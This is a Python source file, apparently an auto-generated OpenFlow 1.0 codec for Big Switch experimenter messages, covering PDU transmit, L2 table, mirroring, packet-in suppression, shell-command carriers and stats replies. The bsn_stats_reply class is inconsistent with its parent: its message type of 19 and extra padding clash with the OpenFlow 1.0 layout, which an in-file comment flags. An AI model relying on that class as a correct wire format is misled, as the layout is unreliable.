        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        obj = bsn_pdu_tx_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # limit the reader to this message's declared length
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 32)
        obj.status = reader.read("!L")[0]
        obj.port_no = util.unpack_port_no(reader)
        obj.slot_num = reader.read("!B")[0]
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.status != other.status: return False
        if self.port_no != other.port_no: return False
        if self.slot_num != other.slot_num: return False
        return True
    def pretty_print(self, q):
        q.text("bsn_pdu_tx_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("status = ");
                q.text("%#x" % self.status)
                q.text(","); q.breakable()
                q.text("port_no = ");
                q.text(util.pretty_port(self.port_no))
                q.text(","); q.breakable()
                q.text("slot_num = ");
                q.text("%#x" % self.slot_num)
            q.breakable()
        q.text('}')
bsn_header.subtypes[32] = bsn_pdu_tx_reply
class bsn_pdu_tx_request(bsn_header):
    """BSN experimenter message, subtype 31: periodically transmit a PDU.

    Payload after the experimenter header: tx_interval_ms (u32),
    port_no, slot_num (u8), 3 pad bytes, then the PDU bytes (rest of
    the message).
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 31
    def __init__(self, xid=None, tx_interval_ms=None, port_no=None, slot_num=None, data=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if tx_interval_ms != None:
            self.tx_interval_ms = tx_interval_ms
        else:
            self.tx_interval_ms = 0
        if port_no != None:
            self.port_no = port_no
        else:
            self.port_no = 0
        if slot_num != None:
            self.slot_num = slot_num
        else:
            self.slot_num = 0
        if data != None:
            self.data = data
        else:
            self.data = ''
        return
    def pack(self):
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!L", self.tx_interval_ms))
        packed.append(util.pack_port_no(self.port_no))
        packed.append(struct.pack("!B", self.slot_num))
        packed.append('\x00' * 3)
        packed.append(self.data)
        # patch the real total length over the placeholder
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        obj = bsn_pdu_tx_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # limit the reader to this message's declared length
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 31)
        obj.tx_interval_ms = reader.read("!L")[0]
        obj.port_no = util.unpack_port_no(reader)
        obj.slot_num = reader.read("!B")[0]
        reader.skip(3)
        # remainder of the message is the raw PDU payload
        obj.data = str(reader.read_all())
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.tx_interval_ms != other.tx_interval_ms: return False
        if self.port_no != other.port_no: return False
        if self.slot_num != other.slot_num: return False
        if self.data != other.data: return False
        return True
    def pretty_print(self, q):
        q.text("bsn_pdu_tx_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("tx_interval_ms = ");
                q.text("%#x" % self.tx_interval_ms)
                q.text(","); q.breakable()
                q.text("port_no = ");
                q.text(util.pretty_port(self.port_no))
                q.text(","); q.breakable()
                q.text("slot_num = ");
                q.text("%#x" % self.slot_num)
                q.text(","); q.breakable()
                q.text("data = ");
                q.pp(self.data)
            q.breakable()
        q.text('}')
bsn_header.subtypes[31] = bsn_pdu_tx_request
class bsn_set_ip_mask(bsn_header):
    """BSN set-IP-mask experimenter message (OpenFlow 1.0, subtype 0).

    Sets IP ``mask`` at table ``index``.
    NOTE(review): auto-generated wire codec -- pack()/unpack() statement
    order is the on-wire byte layout; do not reorder.
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 0
    def __init__(self, xid=None, index=None, mask=None):
        # Fields default to their wire-format zero values when omitted.
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if index != None:
            self.index = index
        else:
            self.index = 0
        if mask != None:
            self.mask = mask
        else:
            self.mask = 0
        return
    def pack(self):
        """Serialize this message; returns the packed wire-format string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!B", self.index))
        # 3 pad bytes to align the mask on a 4-byte boundary.
        packed.append('\x00' * 3)
        packed.append(struct.pack("!L", self.mask))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize from *reader*; asserts fixed header fields match."""
        obj = bsn_set_ip_mask()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Restrict parsing to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 0)
        obj.index = reader.read("!B")[0]
        reader.skip(3)
        obj.mask = reader.read("!L")[0]
        return obj
    def __eq__(self, other):
        # Field-by-field equality; type must match exactly.
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.index != other.index: return False
        if self.mask != other.mask: return False
        return True
    def pretty_print(self, q):
        """Render all fields through formatter *q*."""
        q.text("bsn_set_ip_mask {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("index = ");
                q.text("%#x" % self.index)
                q.text(","); q.breakable()
                q.text("mask = ");
                q.text("%#x" % self.mask)
                q.breakable()
                q.text('}')
# Register in the BSN experimenter dispatch table.
bsn_header.subtypes[0] = bsn_set_ip_mask
class bsn_set_l2_table_reply(bsn_header):
    """BSN set-L2-table reply (OpenFlow 1.0 experimenter message, subtype 24).

    Echoes the requested L2 table enable/priority and reports ``status``.
    NOTE(review): auto-generated wire codec -- pack()/unpack() statement
    order is the on-wire byte layout; do not reorder.
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 24
    def __init__(self, xid=None, l2_table_enable=None, l2_table_priority=None, status=None):
        # Fields default to their wire-format zero values when omitted.
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if l2_table_enable != None:
            self.l2_table_enable = l2_table_enable
        else:
            self.l2_table_enable = 0
        if l2_table_priority != None:
            self.l2_table_priority = l2_table_priority
        else:
            self.l2_table_priority = 0
        if status != None:
            self.status = status
        else:
            self.status = 0
        return
    def pack(self):
        """Serialize this message; returns the packed wire-format string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!B", self.l2_table_enable))
        # 1 pad byte to align the priority field.
        packed.append('\x00' * 1)
        packed.append(struct.pack("!H", self.l2_table_priority))
        packed.append(struct.pack("!L", self.status))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize from *reader*; asserts fixed header fields match."""
        obj = bsn_set_l2_table_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Restrict parsing to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 24)
        obj.l2_table_enable = reader.read("!B")[0]
        reader.skip(1)
        obj.l2_table_priority = reader.read("!H")[0]
        obj.status = reader.read("!L")[0]
        return obj
    def __eq__(self, other):
        # Field-by-field equality; type must match exactly.
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.l2_table_enable != other.l2_table_enable: return False
        if self.l2_table_priority != other.l2_table_priority: return False
        if self.status != other.status: return False
        return True
    def pretty_print(self, q):
        """Render all fields through formatter *q*."""
        q.text("bsn_set_l2_table_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("l2_table_enable = ");
                q.text("%#x" % self.l2_table_enable)
                q.text(","); q.breakable()
                q.text("l2_table_priority = ");
                q.text("%#x" % self.l2_table_priority)
                q.text(","); q.breakable()
                q.text("status = ");
                q.text("%#x" % self.status)
                q.breakable()
                q.text('}')
# Register in the BSN experimenter dispatch table.
bsn_header.subtypes[24] = bsn_set_l2_table_reply
class bsn_set_l2_table_request(bsn_header):
    """BSN set-L2-table request (OpenFlow 1.0 experimenter message, subtype 12).

    Enables/disables the L2 table with the given flow priority.
    NOTE(review): auto-generated wire codec -- pack()/unpack() statement
    order is the on-wire byte layout; do not reorder.
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 12
    def __init__(self, xid=None, l2_table_enable=None, l2_table_priority=None):
        # Fields default to their wire-format zero values when omitted.
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if l2_table_enable != None:
            self.l2_table_enable = l2_table_enable
        else:
            self.l2_table_enable = 0
        if l2_table_priority != None:
            self.l2_table_priority = l2_table_priority
        else:
            self.l2_table_priority = 0
        return
    def pack(self):
        """Serialize this message; returns the packed wire-format string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!B", self.l2_table_enable))
        # 1 pad byte to align the priority field.
        packed.append('\x00' * 1)
        packed.append(struct.pack("!H", self.l2_table_priority))
        # 4 trailing pad bytes (reserved on the wire).
        packed.append('\x00' * 4)
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize from *reader*; asserts fixed header fields match."""
        obj = bsn_set_l2_table_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Restrict parsing to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 12)
        obj.l2_table_enable = reader.read("!B")[0]
        reader.skip(1)
        obj.l2_table_priority = reader.read("!H")[0]
        reader.skip(4)
        return obj
    def __eq__(self, other):
        # Field-by-field equality; type must match exactly.
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.l2_table_enable != other.l2_table_enable: return False
        if self.l2_table_priority != other.l2_table_priority: return False
        return True
    def pretty_print(self, q):
        """Render all fields through formatter *q*."""
        q.text("bsn_set_l2_table_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("l2_table_enable = ");
                q.text("%#x" % self.l2_table_enable)
                q.text(","); q.breakable()
                q.text("l2_table_priority = ");
                q.text("%#x" % self.l2_table_priority)
                q.breakable()
                q.text('}')
# Register in the BSN experimenter dispatch table.
bsn_header.subtypes[12] = bsn_set_l2_table_request
class bsn_set_mirroring(bsn_header):
    """BSN set-mirroring experimenter message (OpenFlow 1.0, subtype 3)."""
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 3
    def __init__(self, xid=None, report_mirror_ports=None):
        self.xid = xid
        self.report_mirror_ports = 0 if report_mirror_ports is None else report_mirror_ports
    def pack(self):
        """Serialize to the on-wire byte string (length patched in place)."""
        pieces = [
            struct.pack("!B", self.version),
            struct.pack("!B", self.type),
            struct.pack("!H", 0),  # length placeholder, patched below
            struct.pack("!L", self.xid),
            struct.pack("!L", self.experimenter),
            struct.pack("!L", self.subtype),
            struct.pack("!B", self.report_mirror_ports),
            '\x00' * 3,  # pad
        ]
        total = sum(len(p) for p in pieces)
        pieces[2] = struct.pack("!H", total)
        return ''.join(pieces)
    @staticmethod
    def unpack(reader):
        """Parse a bsn_set_mirroring message from *reader*."""
        msg = bsn_set_mirroring()
        assert reader.read("!B")[0] == 1      # version
        assert reader.read("!B")[0] == 4      # type
        declared_len = reader.read("!H")[0]
        reader = reader.slice(declared_len, 4)
        msg.xid = reader.read("!L")[0]
        assert reader.read("!L")[0] == 6035143  # experimenter
        assert reader.read("!L")[0] == 3        # subtype
        msg.report_mirror_ports = reader.read("!B")[0]
        reader.skip(3)
        return msg
    def __eq__(self, other):
        return (type(self) == type(other)
                and self.xid == other.xid
                and self.report_mirror_ports == other.report_mirror_ports)
    def pretty_print(self, q):
        """Render all fields through formatter *q*."""
        q.text("bsn_set_mirroring {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                q.text('None' if self.xid is None else "%#x" % self.xid)
                q.text(",")
                q.breakable()
                q.text("report_mirror_ports = ")
                q.text("%#x" % self.report_mirror_ports)
                q.breakable()
                q.text('}')
bsn_header.subtypes[3] = bsn_set_mirroring
class bsn_set_pktin_suppression_reply(bsn_header):
    """BSN packet-in suppression reply (OpenFlow 1.0 experimenter, subtype 25)."""
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 25
    def __init__(self, xid=None, status=None):
        self.xid = xid
        self.status = 0 if status is None else status
    def pack(self):
        """Serialize to the on-wire byte string (length patched in place)."""
        pieces = [
            struct.pack("!B", self.version),
            struct.pack("!B", self.type),
            struct.pack("!H", 0),  # length placeholder, patched below
            struct.pack("!L", self.xid),
            struct.pack("!L", self.experimenter),
            struct.pack("!L", self.subtype),
            struct.pack("!L", self.status),
        ]
        pieces[2] = struct.pack("!H", sum(len(p) for p in pieces))
        return ''.join(pieces)
    @staticmethod
    def unpack(reader):
        """Parse a bsn_set_pktin_suppression_reply message from *reader*."""
        msg = bsn_set_pktin_suppression_reply()
        assert reader.read("!B")[0] == 1      # version
        assert reader.read("!B")[0] == 4      # type
        declared_len = reader.read("!H")[0]
        reader = reader.slice(declared_len, 4)
        msg.xid = reader.read("!L")[0]
        assert reader.read("!L")[0] == 6035143  # experimenter
        assert reader.read("!L")[0] == 25       # subtype
        msg.status = reader.read("!L")[0]
        return msg
    def __eq__(self, other):
        return (type(self) == type(other)
                and self.xid == other.xid
                and self.status == other.status)
    def pretty_print(self, q):
        """Render all fields through formatter *q*."""
        q.text("bsn_set_pktin_suppression_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                q.text('None' if self.xid is None else "%#x" % self.xid)
                q.text(",")
                q.breakable()
                q.text("status = ")
                q.text("%#x" % self.status)
                q.breakable()
                q.text('}')
bsn_header.subtypes[25] = bsn_set_pktin_suppression_reply
class bsn_set_pktin_suppression_request(bsn_header):
    """BSN packet-in suppression request (OpenFlow 1.0 experimenter, subtype 11).

    Configures flow-entry parameters (timeouts, priority, cookie) used to
    suppress repeated packet-ins when ``enabled``.
    NOTE(review): auto-generated wire codec -- pack()/unpack() statement
    order is the on-wire byte layout; do not reorder.
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 11
    def __init__(self, xid=None, enabled=None, idle_timeout=None, hard_timeout=None, priority=None, cookie=None):
        # Fields default to their wire-format zero values when omitted.
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if enabled != None:
            self.enabled = enabled
        else:
            self.enabled = 0
        if idle_timeout != None:
            self.idle_timeout = idle_timeout
        else:
            self.idle_timeout = 0
        if hard_timeout != None:
            self.hard_timeout = hard_timeout
        else:
            self.hard_timeout = 0
        if priority != None:
            self.priority = priority
        else:
            self.priority = 0
        if cookie != None:
            self.cookie = cookie
        else:
            self.cookie = 0
        return
    def pack(self):
        """Serialize this message; returns the packed wire-format string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!B", self.enabled))
        # 1 pad byte to align the timeout fields.
        packed.append('\x00' * 1)
        packed.append(struct.pack("!H", self.idle_timeout))
        packed.append(struct.pack("!H", self.hard_timeout))
        packed.append(struct.pack("!H", self.priority))
        packed.append(struct.pack("!Q", self.cookie))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize from *reader*; asserts fixed header fields match."""
        obj = bsn_set_pktin_suppression_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Restrict parsing to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 11)
        obj.enabled = reader.read("!B")[0]
        reader.skip(1)
        obj.idle_timeout = reader.read("!H")[0]
        obj.hard_timeout = reader.read("!H")[0]
        obj.priority = reader.read("!H")[0]
        obj.cookie = reader.read("!Q")[0]
        return obj
    def __eq__(self, other):
        # Field-by-field equality; type must match exactly.
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.enabled != other.enabled: return False
        if self.idle_timeout != other.idle_timeout: return False
        if self.hard_timeout != other.hard_timeout: return False
        if self.priority != other.priority: return False
        if self.cookie != other.cookie: return False
        return True
    def pretty_print(self, q):
        """Render all fields through formatter *q*."""
        q.text("bsn_set_pktin_suppression_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("enabled = ");
                q.text("%#x" % self.enabled)
                q.text(","); q.breakable()
                q.text("idle_timeout = ");
                q.text("%#x" % self.idle_timeout)
                q.text(","); q.breakable()
                q.text("hard_timeout = ");
                q.text("%#x" % self.hard_timeout)
                q.text(","); q.breakable()
                q.text("priority = ");
                q.text("%#x" % self.priority)
                q.text(","); q.breakable()
                q.text("cookie = ");
                q.text("%#x" % self.cookie)
                q.breakable()
                q.text('}')
# Register in the BSN experimenter dispatch table.
bsn_header.subtypes[11] = bsn_set_pktin_suppression_request
class bsn_shell_command(bsn_header):
    """BSN shell-command message (OpenFlow 1.0 experimenter, subtype 6).

    Carries a shell command string in ``data`` for ``service``.
    NOTE(review): auto-generated wire codec -- pack()/unpack() statement
    order is the on-wire byte layout; do not reorder.
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 6
    def __init__(self, xid=None, service=None, data=None):
        # Fields default to their wire-format zero/empty values when omitted.
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if service != None:
            self.service = service
        else:
            self.service = 0
        if data != None:
            self.data = data
        else:
            self.data = ''
        return
    def pack(self):
        """Serialize this message; returns the packed wire-format string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!L", self.service))
        packed.append(self.data)
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize from *reader*; asserts fixed header fields match."""
        obj = bsn_shell_command()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Restrict parsing to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 6)
        obj.service = reader.read("!L")[0]
        obj.data = str(reader.read_all())
        return obj
    def __eq__(self, other):
        # Field-by-field equality; type must match exactly.
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.service != other.service: return False
        if self.data != other.data: return False
        return True
    def pretty_print(self, q):
        """Render all fields through formatter *q*."""
        q.text("bsn_shell_command {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("service = ");
                q.text("%#x" % self.service)
                q.text(","); q.breakable()
                q.text("data = ");
                q.pp(self.data)
                q.breakable()
                q.text('}')
# Register in the BSN experimenter dispatch table.
bsn_header.subtypes[6] = bsn_shell_command
class bsn_shell_output(bsn_header):
    """BSN shell-output message (OpenFlow 1.0 experimenter, subtype 7)."""
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 7
    def __init__(self, xid=None, data=None):
        self.xid = xid
        self.data = '' if data is None else data
    def pack(self):
        """Serialize to the on-wire byte string (length patched in place)."""
        pieces = [
            struct.pack("!B", self.version),
            struct.pack("!B", self.type),
            struct.pack("!H", 0),  # length placeholder, patched below
            struct.pack("!L", self.xid),
            struct.pack("!L", self.experimenter),
            struct.pack("!L", self.subtype),
            self.data,
        ]
        pieces[2] = struct.pack("!H", sum(len(p) for p in pieces))
        return ''.join(pieces)
    @staticmethod
    def unpack(reader):
        """Parse a bsn_shell_output message from *reader*."""
        msg = bsn_shell_output()
        assert reader.read("!B")[0] == 1      # version
        assert reader.read("!B")[0] == 4      # type
        declared_len = reader.read("!H")[0]
        reader = reader.slice(declared_len, 4)
        msg.xid = reader.read("!L")[0]
        assert reader.read("!L")[0] == 6035143  # experimenter
        assert reader.read("!L")[0] == 7        # subtype
        msg.data = str(reader.read_all())
        return msg
    def __eq__(self, other):
        return (type(self) == type(other)
                and self.xid == other.xid
                and self.data == other.data)
    def pretty_print(self, q):
        """Render all fields through formatter *q*."""
        q.text("bsn_shell_output {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                q.text('None' if self.xid is None else "%#x" % self.xid)
                q.text(",")
                q.breakable()
                q.text("data = ")
                q.pp(self.data)
                q.breakable()
                q.text('}')
bsn_header.subtypes[7] = bsn_shell_output
class bsn_shell_status(bsn_header):
    """BSN shell-status message (OpenFlow 1.0 experimenter, subtype 8)."""
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 8
    def __init__(self, xid=None, status=None):
        self.xid = xid
        self.status = 0 if status is None else status
    def pack(self):
        """Serialize to the on-wire byte string (length patched in place)."""
        pieces = [
            struct.pack("!B", self.version),
            struct.pack("!B", self.type),
            struct.pack("!H", 0),  # length placeholder, patched below
            struct.pack("!L", self.xid),
            struct.pack("!L", self.experimenter),
            struct.pack("!L", self.subtype),
            struct.pack("!L", self.status),
        ]
        pieces[2] = struct.pack("!H", sum(len(p) for p in pieces))
        return ''.join(pieces)
    @staticmethod
    def unpack(reader):
        """Parse a bsn_shell_status message from *reader*."""
        msg = bsn_shell_status()
        assert reader.read("!B")[0] == 1      # version
        assert reader.read("!B")[0] == 4      # type
        declared_len = reader.read("!H")[0]
        reader = reader.slice(declared_len, 4)
        msg.xid = reader.read("!L")[0]
        assert reader.read("!L")[0] == 6035143  # experimenter
        assert reader.read("!L")[0] == 8        # subtype
        msg.status = reader.read("!L")[0]
        return msg
    def __eq__(self, other):
        return (type(self) == type(other)
                and self.xid == other.xid
                and self.status == other.status)
    def pretty_print(self, q):
        """Render all fields through formatter *q*."""
        q.text("bsn_shell_status {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                q.text('None' if self.xid is None else "%#x" % self.xid)
                q.text(",")
                q.breakable()
                q.text("status = ")
                q.text("%#x" % self.status)
                q.breakable()
                q.text('}')
bsn_header.subtypes[8] = bsn_shell_status
class experimenter_stats_reply(stats_reply):
    """Generic experimenter (vendor) stats reply (OpenFlow 1.0).

    ``subtypes`` maps experimenter IDs to more specific subclasses; unpack()
    dispatches through it before falling back to this generic form.
    NOTE(review): pretty_print omits the ``experimenter`` field -- generator
    artifact, kept as-is.
    """
    subtypes = {}
    version = 1
    type = 17
    stats_type = 65535
    def __init__(self, xid=None, flags=None, experimenter=None, data=None):
        # Fields default to their wire-format zero/empty values when omitted.
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if flags != None:
            self.flags = flags
        else:
            self.flags = 0
        if experimenter != None:
            self.experimenter = experimenter
        else:
            self.experimenter = 0
        if data != None:
            self.data = data
        else:
            self.data = ''
        return
    def pack(self):
        """Serialize this message; returns the packed wire-format string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.stats_type))
        packed.append(struct.pack("!H", self.flags))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(self.data)
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize from *reader*, dispatching on the experimenter ID."""
        # Peek the experimenter ID at byte offset 12 without consuming it.
        subtype, = reader.peek('!L', 12)
        subclass = experimenter_stats_reply.subtypes.get(subtype)
        if subclass:
            return subclass.unpack(reader)
        obj = experimenter_stats_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 17)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Restrict parsing to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _stats_type = reader.read("!H")[0]
        assert(_stats_type == 65535)
        obj.flags = reader.read("!H")[0]
        obj.experimenter = reader.read("!L")[0]
        obj.data = str(reader.read_all())
        return obj
    def __eq__(self, other):
        # Field-by-field equality; type must match exactly.
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.flags != other.flags: return False
        if self.experimenter != other.experimenter: return False
        if self.data != other.data: return False
        return True
    def pretty_print(self, q):
        """Render fields through formatter *q*."""
        q.text("experimenter_stats_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("flags = ");
                q.text("%#x" % self.flags)
                q.text(","); q.breakable()
                q.text("data = ");
                q.pp(self.data)
                q.breakable()
                q.text('}')
# Register as the generic handler for experimenter (0xffff) stats replies.
stats_reply.subtypes[65535] = experimenter_stats_reply
class bsn_stats_reply(experimenter_stats_reply):
    """BSN experimenter stats reply base class.

    ``subtypes`` maps BSN stats subtypes to concrete reply classes; unpack()
    dispatches through it first.
    NOTE(review): ``type = 19`` here vs. 17 on the parent -- value comes from
    the generator's input definitions; verify against the protocol spec.
    """
    subtypes = {}
    version = 1
    type = 19
    stats_type = 65535
    experimenter = 6035143
    def __init__(self, xid=None, flags=None, subtype=None):
        # Fields default to their wire-format zero values when omitted.
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if flags != None:
            self.flags = flags
        else:
            self.flags = 0
        if subtype != None:
            self.subtype = subtype
        else:
            self.subtype = 0
        return
    def pack(self):
        """Serialize this message; returns the packed wire-format string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.stats_type))
        packed.append(struct.pack("!H", self.flags))
        # 4 pad bytes before the experimenter header.
        packed.append('\x00' * 4)
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize from *reader*, dispatching on the BSN stats subtype."""
        # Peek the subtype at byte offset 20 without consuming it.
        subtype, = reader.peek('!L', 20)
        subclass = bsn_stats_reply.subtypes.get(subtype)
        if subclass:
            return subclass.unpack(reader)
        obj = bsn_stats_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 19)
        _length = reader.read("!H")[0]
